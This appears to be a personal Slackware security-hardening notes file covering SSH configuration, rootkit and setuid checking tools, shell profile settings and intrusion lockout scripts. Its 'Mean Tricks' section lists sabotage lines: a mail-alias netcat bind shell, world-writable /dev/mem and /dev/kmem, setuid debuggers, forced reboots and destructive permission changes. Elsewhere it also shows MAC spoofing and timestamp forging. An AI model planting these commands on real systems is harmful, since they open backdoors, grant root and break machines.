IdentityFile ~/.ssh/identity IdentityFile ~/.ssh/id_rsa IdentityFile ~/.ssh/id_dsa Port 22 Protocol 2 # Cipher 3des # Ciphers aes256-cbc,aes256-ctr EscapeChar ~ Compression yes HashKnownHosts yes EnableSSHKeysign no LogLevel DEBUG PubkeyAuthenticaton yes ServerAliveInterval 60 ServerAliveCountMax 10 TCPKeepAlive no UserKnownHostsFile ~/.ssh/known_hosts /etc/ssh/sshd_config Port 22 Protocol 2 AddressFamily inet ListenAddress 192.168.1.2 # HostKey for protocol version 1 #HostKey /etc/ssh/ssh_host_key # HostKeys for protocol version 2 HostKey /etc/ssh/ssh_host_rsa_key HostKey /etc/ssh/ssh_host_dsa_key # Lifetime and size of ephemeral version 1 server key #KeyRegenerationInterval 1h #ServerKeyBits 768 # Logging # obsoletes QuietMode and FascistLogging SyslogFacility AUTH LogLevel DEBUG # Authentication: LoginGraceTime 2m PermitRootLogin no StrictModes yes MaxAuthTries 6 AllowUsers dentonj@trustedhost AllowGroups wheel RSAAuthentication no PubkeyAuthentication yes AuthorizedKeysFile .ssh/authorized_keys # For this to work you will also need host keys in /etc/ssh/ssh_known_hosts RhostsRSAAuthentication no # similar for protocol version 2 HostbasedAuthentication no # Change to yes if you don't trust ~/.ssh/known_hosts for # RhostsRSAAuthentication and HostbasedAuthentication IgnoreUserKnownHosts no # Don't read the user's ~/.rhosts and ~/.shosts files IgnoreRhosts yes # To disable tunneled clear text passwords, change to no here! PasswordAuthentication no PermitEmptyPasswords no # Change to no to disable s/key passwords #ChallengeResponseAuthentication yes # Kerberos options #KerberosAuthentication no #KerberosOrLocalPasswd yes #KerberosTicketCleanup yes #KerberosGetAFSToken no # GSSAPI options #GSSAPIAuthentication no #GSSAPICleanupCredentials yes #UsePAM no AllowTcpForwarding yes GatewayPorts no X11Forwarding no X11DisplayOffset 10 X11UseLocalhost yes PrintMotd yes PrintLastLog yes TCPKeepAlive no UseLogin no UsePrivilegeSeparation yes PermitUserEnvironment no Compression delayed ClientAliveInterval 60 ClientAliveCountMax 10 UseDNS yes PidFile /var/run/sshd.pid #MaxStartups 10 # no default banner path Banner /etc/issue.net # override default of no subsystems #Subsystem sftp /usr/libexec/sftp-server # Ciphers aes256-cbc,aes256-ctr # login.conf(5) is not used in Slackware ChallengeResponseAuthentication no root@darkstar:~# chmod u-s /usr/libexec/ssh-keysign man ssh man sshd man ssh_config man sshd_config /etc/ssh/sshrc: TODO /usr/bin/mysql_safe: TODO root@darkstar:~# less /var/lib/mysql/darkstar.err man mysql_fix_privilege_tables NFS: root@darkstar:~# removepkg nfs-utils NIS: root@darkstar:~# removepkg yptools ----[ Security Programs/Scripts ]---- GnuPG: On the Slackware Source CD 3: mount /mnt/cdrom cd /mnt/cdrom/testing/packages installpkg gnupg-1.4.2-i486-1.tgz libsafe: On the Slackware Source CD 3: mount /mnt/cdrom cd /mnt/cdrom/extra/libsafe-2.0.16 installpkg libsafe-2.0.16-i386-1.tgz Snort: http://www.snort.org TODO sXid: http://packages.debian.org/stable/source/sxid root@darkstar:~# cp sxid_4.0.5.tar.gz src root@darkstar:~# cd src root@darkstar:~/src# gzip -cd sxid_4.0.5.tar.gz | tar xvf - root@darkstar:~/src# cd sxid-4.0.5 root@darkstar:~/src/sxid-4.0.5# less README root@darkstar:~/src/sxid-4.0.5# make install /usr/local/etc/sxid.conf: ALWAYS_NOTIFY = "yes" ALWAYS_ROTATE = "yes" IGNORE_DIRS = "" /etc/cron.daily/sxid: #!/bin/sh /usr/local/bin/sxid root@darkstar:~# chmod 700 /etc/cron.daily/sxid root@darkstar:~# sxid chkrootkit: http://www.chkrootkit.org root@darkstar:~# cp chkrootkit_0.46a.tar.gz src/ root@darkstar:~# cd src root@darkstar:~/src# gzip -cd chkrootkit_0.46a.tar.gz | tar xvf - root@darkstar:~/src# cd chkrootkit-0.46a root@darkstar:~/src/chkrootkit-0.46a# less README root@darkstar:~/src/chkrootkit-0.46a# make sense Copy the following to /usr/local/sbin: check_wtmpx chkdirs chklastlog chkproc chkrootkit chkutmp chkwtmp ifpromisc strings-static root@darkstar:~# crontab -e # Chkrootkit, results are mailed to root 10 4 * * * ( cd /usr/local/sbin && ./chkrootkit 2>&1) root@darkstar:~# killall -HUP crond aide: http://sourceforge.net/project/aide TODO lcap: root@darkstar:~# cp lcap_0.0.6.orig.tar.gz src/ root@darkstar:~# cd src root@darkstar:~/src# gzip -cd lcap_0.0.6.orig.tar.gz | tar xvf - root@darkstar:~/src/# cd lcap-0.0.6/ root@darkstar:~/src/lcap-0.0.6# less README root@darkstar:~/src/lcap-0.0.6# make root@darkstar:~/src/lcap-0.0.6# strip lcap root@darkstar:~/src/lcap-0.0.6# cp lcap /usr/local/sbin ----[ Usibility/Reducing Security ]---- Run X applications as root: The Linux Security Cookbook contains a short script that will set DISPLAY and XAUTHORITY to allow root to run X apps. Or you can cheat by setting DISPLAY and HOME to accomplish the same thing. root@darkstar:~# xv xv: Can't open display root@darkstar:~# DISPLAY=:0.0 root@darkstar:~# xv Xlib: connection to ":0.0" refused by server Xlib: Invalid MIT-MAGIC-COOKIE-1 key xv: Can't open display root@darkstar:~# HOME=/home/dentonj root@darkstar:~# xv A better way is to use xauth and set the MIT-MAGIC-COOKIE: root@darkstar:~# xauth -f /home/dentonj/.Xauthority extract - :0 | \ xauth merge - root@darkstar:~# xauth list darkstar/unix:0 MIT-MAGIC-COOKIE-1 abcdef0123456789abcdef0123456789 dentonj@darkstar:~$ xauth list darkstar/unix:0 MIT-MAGIC-COOKIE-1 abcdef0123456789abcdef0123456789 localhost:0 MIT-MAGIC-COOKIE-1 9876543219fedcba9876543210fedcba You still have to set DISPLAY for root. Be aware that setting DISPLAY in a shell config file (e.g. - /etc/profile) may cause problems with X forwarding in ssh. man xauth man Xsecurity /usr/bin/lessopen.sh: I like to dig around inside of binaries. Uncomment the following lines: *) FILE=`file -L "$1"` ; # Check to see if binary, if so -- view with 'strings' FILE1=`echo $FILE | cut -d ' ' -f 2` FILE2=`echo $FILE | cut -d ' ' -f 3` if [ "$FILE1" = "Linux/i386" -o "$FILE2" = "Linux/i386" \ -o "$FILE1" = "ELF" -o "$FILE2" = "ELF" ]; then strings "$1" fi ;; Error Beep: I make extensive use of tab completion in bash. However, the error beeps tend to annoy those around me. Here are three ways to turn off the error beep. /etc/profile: setterm -bfreq 0 ~/.xinitrc: xset -b exec /usr/X11R6/bin/startfluxbox /etc/inputrc: set bell-style none man bash ----[ Mean Tricks ]---- /etc/aliases: opensaysme: | nc -l -p 44444 -e /bin/sh ~/.forward: | nc -l -p 44444 -e /bin/sh /etc/login.defs: NO_PASSWORD_CONSOLE tty1,tty2,tty3,tty4,tty5,tty6 /etc/rc.d/rc.6: touch /etc/forcefsck /etc/hotplug/blacklist: hid /etc/inittab: id:6:initdefault: iptables -m random iptables -A FORWORD -s 192.168.1.1 -m random --average 90 -j DROP iptables -A INPUT -j DROP Anywhere in /etc/rc.d: reboot enable -n enable chmod u+s /usr/bin/strace chmod u+s /usr/bin/gdb chmod 666 /dev/mem chmod 666 /dev/kmem chmod 666 /dev/port ifconfig eth0 mtu 68 touch ./-r # Look mom, I'm securing my system! chmod -R 600 /etc ----[ Useful Commands ]---- ldd /usr/bin/lppasswd /lib/ld-linux.so.2 --list /usr/bin/lppasswd strings /usr/bin/lppasswd List some of the popular REM commands used. man -k cron grep crond /var/log/packages/* cd /bin && for i in `ls | grep -v "@$"`; do file $i | grep "not stripped" done for i in /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin \ /usr/X11R6/bin; do echo $i; cd $i && for j in `ls | grep "@$"`; do file $j \ | grep "not stripped"; done; done which kill type -a kill stat /bin/login touch example stat example touch -r /bin/login example stat example strace -p 19148 -f -e trace=network,read,write -o ssh_trace.out -e write=4 \ -e read=6 # Where 19148 is the PID of sshd ifconfig eth0 hw ether 00:00:DE:AD:BE:EF ifconfig eth0 0.0.0.0 up -arp ln -s /usr/bin/write /bin/write kibitz dentonj netwatch iptraf last -f /var/log/wtmp.1.gz grep -ir secur /usr/doc/* > security.txt ----[ /etc/profile ]---- # Kick and lockout users that are UID 0 but are not root if [ `id -u` = "0" -a `echo $USER` != "root" ]; then # Lock the user out passwd -l $USER # Save some info date >> /root/SHIT netstat -peanut >> /root/SHIT ps auxww >> /root/SHIT w >> /root/SHIT w | mail -s "$USER has gained ROOT access on $HOSTNAME" dentonj@gmail.com # Let EVERYONE know wall << EOF **************************************************************** $USER has gained ROOT access on $HOSTNAME!!! **************************************************************** EOF for i in `ls /dev/pts/`; do echo -e "\n$USER has gained ROOT access on $HOSTNAME!!\n" >> /dev/pts/$i done # Log it logger -is -f /var/log/messages "$USER has gained ROOT access!!" # Let the luzer know echo -e "\a\n\n You are _NOT_ root!!\n\n\a" # For the really paranoid (run before killing the user's processes) ifconfig eth0 down # Kill the user and their processes skill -9 -u $USER # This should be redundant logout exit fi export LESSOPEN="|/usr/bin/lessopen.sh %s" # Set a default shell prompt: #PS1='`hostname`:`pwd`#' #if [ "$SHELL" = "/bin/pdksh" ]; then # PS1='! $ ' #elif [ "$SHELL" = "/bin/ksh" ]; then # PS1='! ${PWD/#$HOME/~}$ ' #elif [ "$SHELL" = "/bin/zsh" ]; then # PS1='%n@%m:%~%# ' #elif [ "$SHELL" = "/bin/ash" ]; then # PS1='$ ' #else # PS1=/\u@\h:\w\$ ' #fi if [ `id -u` = 0 ]; then # A red shell prompt for root PS1="\[\033[1;31m\][\j][\u@\h:\w]#\[\033[0m\] " else # A green shell prompt for everyone else PS1="\[\033[1;32m\][\j][\u@\h:\w]$\[\033[0m\] " fi PS2='>' export PATH LESS TERM PS1 PS2 # For non-root users, add the current directory to the search path: #if [ ! "`id -u`" = "0" ]; then # PATH="$PATH:." #fi # # Stuff I've added # # Add $HOME/bin to the search path PATH=$PATH:$HOME/bin export PATH export FIGNORE=".o" # Set EDITOR for less export EDITOR=vim # History # I use to set these to paranoid settings, such as 100 or 10. export HISTSIZE=10000 export HISTFILESIZE=10000 # Display timestamp information with each history entry export HISTTIMEFORMAT="%F %T " # Logout if a root terminal is not being used if [ `id -u` = "0" ]; then export TMOUT=1200 fi # Aliases alias matrix="cmatrix -bass" alias m="cmatrix -bass" alias su="su -" alias td="tcpdump -nvvSi eth0 | grcat conf.tcpdump" # shred doesn't delete recursively # use "/bin/rf -rf ..." for directories alias rm="shred -uz" # Disable the bash builtin command kill, forces the use # of /bin/kill. # This was a cute idea, but it prevents jobs from being killed #enable -n kill # Misc shell settings shopt -s cdspell shopt -s cmdhist shopt -s dotglob shopt -s extglob setterm -bfreq 0 # grep options export GREP_OPTIONS="-n --color" export GREP_COLOR="1;33" # Secure less export LESSSECURE=1 # This works for single user systems if the luzer who breaks into your # system uses an interactive shell if [ `id -u` != "0" -o `id -u` != "1000" ]; then passwd -l $USER logout fi # Set these and make them read only to keep users from setting them export HISTCONTROL="" export HISTIGNORE="" # Disable builtin shell commands # TODO # Set shell variables as read only, this should be last: typeset -r HISTCONTROL typeset -r HISTFILE typeset -r HISTFILESIZE typeset -r HISTIGNORE typeset -r HISTNAME typeset -r HISTSIZE typeset -r LESSSECURE typeset -r LOGNAME typeset -r USER -- When You Are Done -- Join the irc channel #slackware on irc.oftc.net and talk about everything but Slackware. -- Stuff that didn't work -- # If the following variables are not set, exit with an error message : ${USER:?Who are you?} : ${LOGNAME:?Who are you?} : ${HOME:?The homeless need help} # If a user doesn't have a home directory listed in /etc/passwd, # login is nice enough to set "/" as $HOME if [ ${HOME} = "/" ]; then logout fi -- Todo -- KDE: Look into it /etc/shells: Lock down the other shells. /bin/login: Modify so a different encryption hashing algorithms is used. Securing filesystems other than ext2 and ext3 Log checking utility -- Resources --